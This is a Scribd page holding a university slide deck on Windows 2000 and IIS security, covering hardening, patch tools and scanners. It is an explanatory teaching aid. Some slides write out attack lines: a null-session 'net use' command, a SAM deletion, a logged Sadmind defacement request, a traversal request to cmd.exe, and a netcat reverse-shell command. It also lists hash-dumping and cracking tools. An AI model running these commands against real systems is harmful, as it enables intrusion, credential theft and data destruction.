Scribd
Upload
392 views70 pages

Windows 2000 Security Guide

Evaluation of Security Service/Policy Demand for Windows and Linux security advice Need for other OS security advice Installation of Internet Facing Windows 2000 systems.

Uploaded by

Achmad Hidayat
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPT, PDF, TXT or read online on Scribd
392 views70 pages

Windows 2000 Security Guide

Evaluation of Security Service/Policy Demand for Windows and Linux security advice Need for other OS security advice Installation of Internet Facing Windows 2000 systems.

Uploaded by

Achmad Hidayat
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPT, PDF, TXT or read online on Scribd

Windows 2000 Security

Matthew Cook
Loughborough University
http://www.escarpment.net/

1
Introduction

Loughborough University
http://www.lboro.ac.uk/computing/

Janet Web Cache Service


http://wwwcache.ja.net

2
Security @ Lboro
✦ Evaluation of Security Service/Policy
✦ Demand for Windows and Linux security
advice
✦ Need for other OS security advice

✦ Installation of Internet Facing Windows


2000 systems.

3
Windows 2000 Security
✦ Overview of General Security Threats
✦ Workstation Security

✦ Server Security

✦ IIS Security

✦ Security Tools

✦ Questions and Answers

4
Physical Security

"The only system which is truly


secure is one which is switched off
and unplugged, locked in a titanium
lined safe, buried in a concrete
bunker, and is surrounded by …
very highly paid armed guards. Even
then, I wouldn't stake my life on it."
Gene Spafford

5
Security Threats
✦ Denial of Service
✦ Theft of information

✦ Modification

✦ Fabrication (Spoofing or Masquerading)

6
Security Holes
✦ Physical Security Holes
✦ Software Security Holes

✦ Incompatible Usage Security Holes

✦ Social Engineering

✦ Complacency

7
Workstation Security

Security for General Workstations

8
Workstation Security
✦ Physical Security
✦ BIOS
✦ Service Packs and Hot fixes
✦ NTFS ACLS
✦ Policies and Profiles
✦ Security Templates
✦ Auditing
✦ Threats
9
Service Packs and Hot fixes
✦ Ensure you have the latest ‘evaluated’
service packs and hot fixes.
✦ Check the model periodically

✦ Hfnetchk Tool

10
NTFS ACLS
✦ Ensure you use NTFS
✦ Partition your drives per application

✦ Use xcacls from the Resource Kit

✦ Script NTFS security

✦ Set using Security Templates

✦ Example

11
Policies and Profiles
✦ NT Policy files are different to GPO (Group
Policy Objects) in Windows 2000
✦ LGPO located in:
%windir%\system32\grouppolicy
✦ ADGPO located in:
%windir%\system32\sysvol\camford\policies
✦ Demonstration

12
Security Templates
✦ Use ‘Security Settings’ applet to apply
✦ Located in %windir%\security\templates

✦ Quick and Easy to apply

✦ Templates are accumulative

✦ Demonstration

13
Security Templates…
✦ Setup security – Default settings
✦ Compatws – Compatible

✦ Basicdc/sv/wk – Basic Security

✦ Securedc/wk – More Secure

✦ Hisecdc/ws – Further Security

✦ Ocfiless/w – Optional Components

14
Auditing & Event Logs
✦ Use the ‘Security Settings’ applet to ensure
the Audit Policy has been configured
✦ Check the Event Viewer regularly

✦ Or Use NTLast (Foundstone)

✦ URL: http://www.foundstone.com/

✦ Or ELM (TNT Software)

✦ URL: http://www.tntsoftware.com/

15
Threats
✦ PipeUpAdmin and PipeUpSAM
✦ Netddemsg

✦ EFS

✦ DOS Boot disc

✦ Linux Boot disc

✦ BIOS Passwords

16
PipeUpAdmin & PipeUpSAM
✦ Uses vulnerability in Named Pipes in the
Service Control Manger (SCM)
✦ Adds user to Administrator Group

✦ Patch Bulletin: MS00-053

✦ URL: http://www.dogmile.com/files/

17
Netddemsg
✦ Uses vulnerability in NetDDE
✦ Provides cmd in SYSTEM context

✦ Patch Bulletin: MS01-007

✦ NOT included in Windows 2000 SP2

18
EFS
✦ Changing the password of the recovery
agent. (Administrator)
✦ Changing the password of the user

✦ EFS temporary files

19
DOS Boot Disc
✦ DOS NTFS drivers bypass NTFS ACLS
✦ Allows removal of the SAM
del %windir%\system32\config\sam
✦ Allows extraction of the SAM
✦ URL: http://www.sysinternals.com/
✦ URL:
http://www.esiea.fr/public_html/Christophe.GRE
NIER/

20
Linux Boot Disc
✦ Edit SAM password hashes
✦ Disable SYSKEY

✦ Limited SCSI support

✦ URL: http://home.eunet.no/~pnordahl/

21
BIOS Passwords
✦ Even a BIOS password is not secure
✦ Check for vulnerabilities

✦ Check for Default Passwords

✦ Upgrade BIOS

✦ URL:
http://www.esiea.fr/public_html/Christophe.GRE
NIER/

22
Server Security

Security for Internet Facing Servers

23
Server Security
✦ Advice for Workstation Security
✦ NetBIOS/SMB Services

✦ Hfnetchk and Qchain

✦ SNMP Vulnerabilities

✦ Active Directory Vulnerabilities

✦ IPSec

24
NetBIOS/SMB Services
✦ NetBIOS Name Service [Port UDP 137]
✦ NetBIOS Session Service [Port TCP 139]

✦ SMB over TCP [Port 445]

✦ Port 445 Windows 2000 only

✦ Block TCP/UDP 135-139 and 445 at the


firewall

25
NetBIOS/SMB Services…

Null Authentication:
Net use \\camford\IPC$ “” /u:“”
✦ Famous tools like ‘Red Button’

Net view \\camford


✦ Investigate srvcheck and srvinfo in the
Resouce Kit

26
NetBIOS/SMB Services…
✦ Dumpsec from Somarsoft
✦ URL: http://www.somarsoft.com

✦ Enum from Razor

✦ URL: http://razor.bindview.com/

✦ A Google search reveals many, many more

27
NetBIOS/SMB Services…

To disable NetBIOS
2. Select ‘Disable NetBIOS’ in the WINS
tab of advanced TCP/IP properties.
3. Deselect ‘File and Print sharing’ in the
advanced settings of the ‘Network and
Dial-up connections’ window

28
NetBIOS/SMB Services…

Disable Null Authentication


✦ Key similar to Windows NT 4.0
✦ HKLM\SYSTEM\CurrentControlSet\Control\LSA
\RestrictAnonymous
✦ REG_DWORD set to 0, 1 or 2!
✦ HKLM\SYSTEM\CurrentControlSet\Control\Sec
urePipeServers\RestrictAnonymous
✦ REG_DWORD set to 0 or 1
29
Hfnetchk
✦ Use Hfnetchk to check hot fixes
✦ Checks machines against Microsoft XML

✦ Automate the process using a batch files


and a mail client (Postie)
✦ URL: http://www.infradig.com/infradig/postie/

✦ Use QChain to chain hot fixes together


without rebooting in-between.

30
Hfnetchk…

Patch details for:


✦ Windows NT 4.0 and Windows 2000

✦ IIS 4 and IIS 5

✦ SQL Server 7.0

✦ SQL Server 2000

✦ Internet Explorer 5.01 (and later)

31
Hfnetchk…
✦ Default scan of local host (Pre downloaded)
hfnetchk –x mssecure.xml
✦ Default scan of lboro domain
hfnetchk –d lboro
✦ Verbose scan of local host
hfnetchk –v –x mssecure.xml
✦ Verbose scan including installed hot fixes
hfnetchk –v –a b –x mssecure.xml

32
Hfnetchk…
✦ Test problems
hfnetchk –z –v –x mssecure.xml
✦ XML File Download
http://download.microsoft.com/download/xml
/security/1.0/nt5/en-us/mssecure.cab
✦ Using an internal copy of the XML
hfnetchk –x http://camford.ac.uk/mssecure.xml
hfnetchk –x s:\camford\mssecure.xml

33
QChain

Supported by:
✦ Windows NT 4.0

✦ Windows 2000

✦ Windows XP (25th October 2001)

34
QChain…
✦ Run the hot fix with –z (No reboot) and –m
(Quiet mode)
✦ Run qchain and then reboot
✦ Create a log using qchain [logname]
✦ Create batch files on a central server
✦ URL:
http://www.microsoft.com/Downloads\Release.as
p?ReleaseID=29821

35
SNMP Vulnerabilities
✦ Simple Network Management Protocol
✦ Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25
✦ SNMP Utilities in Resource Kit
✦ Turn off SNMP services

✦ Set community names

✦ Set accepted hosts

36
SNMP Vulnerabilities…

37
AD Vulnerabilities
✦ Listing of AD contents using ldp.exe
✦ Ldp is contained on the Resource Kit

✦ Authenticated connection needed

✦ Filter TCP 389 (LDAP) and 3268 (GC)

✦ DNS – Securing Zone Transfers to Slave


Name servers only

38
IPSec
✦ Currently investigating
✦ Linux Connectivity using FreeS/WAN

✦ Mainly for wireless use

✦ WEP encryption cracked

✦ URL: http://www.freeswan.org/

✦ URL: http://airsnort.sourceforge.net/

39
IIS Security

Internet Information Server

40
IIS Security
✦ History
✦ Recent Worms

✦ IIS Lock Down Tool

✦ URL Scan

✦ The Future

41
IIS History
✦ IIS 2.0 Installed by NT 4.0
✦ IIS 3.0 followed by more common IIS 4.0

✦ Quickly gained reputation for (in)security

✦ IIS 5.0 Installed by Windows 2000

✦ Microsoft releases Hfnetchk

✦ Closely followed by IIS Lockdown and


URLScan
42
Recent Worms
✦ Sadmind/IIS
Directory Traversal (Unicode Exploit)
✦ CodeRed
ida/idq buffer overflow
✦ CodeGreen
ida/idq buffer overflow
✦ Nimda
Directory Traversal (Unicode Exploit)
43
Sadmind/IIS
✦ 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80
GET /scripts/root.exe
/c+echo+^<html^>^<body+bgcolor%3Dblack^>^
<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table
+width%3D100%^>^<td^>^<p+align%3D%22ce
nter%22^>^<font+size%3D7+color%3Dred^>f**
*+USA+Government^</font^>^<tr^>^<td^>^<p+
align%3D%22center%22^>^<font+size%3D7+col
or%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+a
lign%3D%22center%22^>^<font+size%3D4+colo
r%3Dred^>contact:sysadmcn@yahoo.com.cn^</h
tml^>>../wwwroot/default.htm 200 -
44
System Attacks
✦ Monday Morning Phone Call
✦ Perl Script ‘unicodeloader’

✦ http://camford/scripts/upload.asp

✦ http://camford/scripts/cmdasp.asp

✦ Sadmind/IIS worm and unicodeloader kit

✦ GET /scripts/../../winnt/system32/cmd.exe
/c+dir 200 –
✦ URL: http://www.sensepost.com/
45
System Attacks…
✦ Obtaining a remote shell
✦ Attacking PC:
nc –l –p 1234
✦ Camford:
nc.exe –v –e cmd.exe <attackingpc> 1234
✦ URL: http://www.atstake.com/research/tools/

46
System Attacks…
✦ Shell is in the context of IUSR_camford
✦ ISAPI.dll – RevertToSelf (Horovitz)
✦ Upload using upload.asp
✦ http://camford/scripts/idq.dll
✦ Version 2 coded by Foundstone
✦ http://camford/scripts/idq.dll?
✦ Patch Bulletin: MS01-26
✦ NOT included in Windows 2000 SP2
47
IIS Lock Down Tool
✦ Automatic ‘Lock Down’
✦ Locks down IIS 4.0 and IIS 5.0
✦ Express ‘lock down’ for simple web sites
✦ Custom ‘lock down’ for more complex
servers
✦ Undo facility to reverse last ‘lock down’
✦ URL:
http://www.microsoft.com/Downloads\Release.as
p?ReleaseID=32362
48
IIS Lock Down Tool…

Disable: Remove:
✦ Active Server Pages ✦ Sample Web Files
✦ Script Virtual
✦ Index Server Interface
Directory
✦ Server Side Includes
✦ MSADC Directory
✦ Internet Data
✦ WebDAV
Connector
Set Permissions on:
✦ Internet Printing
✦ Exe files
✦ HTR Scripting
✦ Content Directories

49
URL Scan
✦ ISAPI filter scans incoming HTTP requests
✦ Filtered based on rule set
✦ New rules easily added
✦ Default urlscan.ini suitable for static pages
✦ Restart service when changes made
✦ 404 and logged request for matched rules
✦ URL:
http://www.microsoft.com/Downloads\Release.as
p?ReleaseID=32571
50
URL Scan…

Filter on:
✦ The request method (verb)

✦ File Extension

✦ URL Encoding

✦ Non ASCII characters

✦ Malicious character sequence

✦ Headers in HTTP GET

51
The Future
✦ Gartner report recommends ditching IIS
✦ Rewrite of IIS on the cards for version 6

✦ Lock Down Tool (Interim Measures)

✦ Httpd functionality in the kernel (TechEd)

✦ IIS Lockdown included in SP3

✦ Further implications for .NET

52
Security Tools

A look at the freeware and


‘pay for’ tools available.

53
Security Tools
✦ Snort
✦ CIS and Typhon
✦ Pwdump
✦ Fport
✦ L0pht Crack
✦ Nmap
✦ Nessus
✦ Pandora
54
Snort
✦ IDS – Intrusion Detection System
✦ Libpcap packet sniffer and logger

✦ Originally developed for the Unix platforms

✦ Open Source

✦ Port to Win32 available (Release 1.8.1)

✦ Installation on Win32 in under 30 minutes

✦ Run on your IIS server or standalone

55
Snort…

Snort can detect:


✦ Stealth Port Scans
✦ CGI Attacks
✦ Front Page Extensions Attacks
✦ ICMP Activity
✦ SMTP Activity
✦ SQL Activity
✦ SMB Probes
56
Snort…
✦ Default logging to snort\logs\alert.ids
✦ Log to mySQL and SQL Server
✦ Notification as logs, ‘winpopup’, email etc
✦ SnortSnaf or ACID (PHP Based)
✦ GUI – IDS Center
✦ URL: http://snort.sourcefire.com/
✦ URL: http://www.cert.org/kb/acid/
✦ URL: http://www.silicondefense.com/
57
Snort…

58
CIS and Typhon
✦ Typhon, formally Cerberus Internet Scanner
✦ Written by David Litchfield

✦ URL: http://www.nextgenss.com/

✦ Demonstration

59
CIS and Typhon
✦ Web Checks ✦ SNMP Checks
✦ FTP Checks ✦ RPC Checks
✦ SMTP Checks ✦ Portscan (TCP/UDP)
✦ POP3 Checks ✦ Finger Checks
✦ NT Checks ✦ DNS Checks
✦ NetBIOS Checks
✦ MS SQL Checks ✦ Commercial Version

60
Pwdump
✦ Version 3 (e = encrypted)
✦ Developed by Phil Staubs and Erik
Hjelmstad
✦ Based on pwdump and pwdump2

✦ URL: http://www.ebiz-
tech.com/html/pwdump.html

61
Pwdump…
✦ Needs Administrative Privilidges
✦ Extracts hashs even if syskey is installed

✦ Extract from remote machines

✦ Identifies accounts with no password

✦ Self contained utility

62
Fport
✦ Reports on all open TCP and UDP ports
✦ Maps Port to Application

✦ Requires psapi.dll (Windows NT 4.0)

✦ URL: http://www.foundstone.com/

✦ Demonstration

63
L0pht Crack
✦ Password Auditing and Recovery
✦ Crack Passwords from many sources

✦ Registration $249

✦ URL: http://www.atstake.com/research/lc3/

✦ Demonstration

64
L0pht Crack…

Crack Passwords from:


✦ Local Machine

✦ Remote Machine

✦ SAM File

✦ SMB Sniffer

✦ PWDump file

65
Nmap
✦ Port Scanning Tool
✦ Stealth scanning, OS Fingerprinting

✦ Open Source

✦ Runs under Unix based OS

✦ Port development for Win32

✦ URL: http://www.insure.org/nmap/

66
Nmap…

67
Nessus
✦ Remote security scanner similar to Typhon
✦ Very comprehensive

✦ Frequently updated modules

✦ Testing of DoS attacks

✦ Open Source

✦ Win32 and Java Client

✦ URL: http://nessus.org/

68
Pandora
✦ Not strictly Windows 2000 Security
✦ Runs on either Unix or Win32

✦ Excellent tool to evaluate Netware security

✦ Open Source

✦ Lots of additional information

✦ URL: http://www.nmrc.org/pandora/

69
Questions and Answers

70

You might also like